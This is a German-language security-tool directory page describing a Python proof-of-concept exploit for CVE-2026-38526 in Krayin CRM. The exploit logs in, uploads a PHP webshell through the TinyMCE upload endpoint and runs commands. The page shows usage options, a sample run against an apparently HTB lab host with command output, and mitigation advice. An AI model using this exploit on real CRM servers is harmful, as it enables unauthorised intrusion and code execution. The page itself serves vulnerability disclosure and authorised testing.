Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-38526 — Python-PoC, das CVE-2026-38526 in Krayin CRM <= 2.2.x ausnutzt: authentifiziert sich, lädt eine PHP-Webshell über /admin/tinymce/upload hoch und führt Befehle remote aus. | Kitploit
Tools/GitHubGitHub/mrdark-ops/cve-2026-38526
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitCTFPenetrationstestsRemote-Access-ToolPayload-Entwicklung
GitHubmrdark-ops/cve-2026-38526

CVE-2026-38526

Python-PoC, das CVE-2026-38526 in Krayin CRM <= 2.2.x ausnutzt: authentifiziert sich, lädt eine PHP-Webshell über /admin/tinymce/upload hoch und führt Befehle remote aus.

vor 2 TagenNoch nicht geprüft
Repository anzeigen

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-38526 — Krayin CRM ≤ 2.2.x Authentifizierte RCE

⚠️ Rechtlicher Hinweis: Dieser Code wird ausschließlich zu Bildungszwecken und für autorisierte Tests bereitgestellt (CTF, Bug Bounty, privates Labor). Der Autor ist nicht für eine illegale Nutzung verantwortlich.

Beschreibung

Krayin CRM (Webkul) ≤ 2.2.x stellt den Endpoint /admin/tinymce/upload bereit, der es einem authentifizierten Benutzer (auch mit geringen Berechtigungen) ermöglicht, Dateien ohne Validierung der Dateiendung hochzuladen. Die Datei wird anschließend aus dem Ordner storage/ ausgeliefert, was die beliebige Ausführung von PHP-Code ermöglicht.

  • Typ: Arbitrary File Upload → RCE
  • CVSS: 9.9 (Kritisch)
  • Erforderliche Authentifizierung: Ja (jedes gültige Konto)

Installation

git clone https://github.com/<TON_PSEUDO>/cve-2026-38526.git
cd cve-2026-38526
pip install -r requirements.txt

Verwendung

python3 cve-2026-38526.py -t http://target.tld -u [email protected] -p 'password' -c 'id'

Optionen:

OptionBeschreibung
-t, --targetRoot-URL des Ziels
-u, --userE-Mail des Krayin-Kontos
-p, --passwordPasswort
-c, --commandAuszuführender Befehl (Standard: id)
--login-pathLogin-Pfad (Standard: /admin/login)
--upload-pathUpload-Pfad (Standard: /admin/tinymce/upload)
--timeoutHTTP-Timeout (Standard: 15)

Beispiel

$ python3 cve-2026-38526.py -t http://billing.nexus.htb \
    -u [email protected] -p 'N27xh!!2ucY04' -c 'id'

[*] Abrufen des CSRF-Tokens auf http://billing.nexus.htb/admin/login
[*] Senden des Login-Formulars
[+] Authentifizierung erfolgreich
[*] Upload von x8f2k1ab.php über http://billing.nexus.htb/admin/tinymce/upload
[+] Webshell erreichbar: http://billing.nexus.htb/storage/tinymce/x8f2k1ab.php
[*] Ausführung: id

============================================================
[+] Befehl: id
============================================================
uid=33(www-data) gid=33(www-data) groups=33(www-data)
============================================================

Mitigation

  • Krayin CRM auf die korrigierte Version aktualisieren.
  • Die Dateiendung hochgeladener Dateien einschränken (Whitelist).
  • Die PHP-Ausführung in den Ordnern storage/ und uploads/ verbieten.
  • Das Prinzip der geringsten Rechte auf CRM-Konten anwenden.

Disclaimer

Dieses Projekt wird zu Zwecken der Sicherheitsforschung veröffentlicht. Jede Nutzung gegen Systeme ohne vorherige schriftliche Genehmigung ist illegal und strengstens verboten.

Tool herunterladen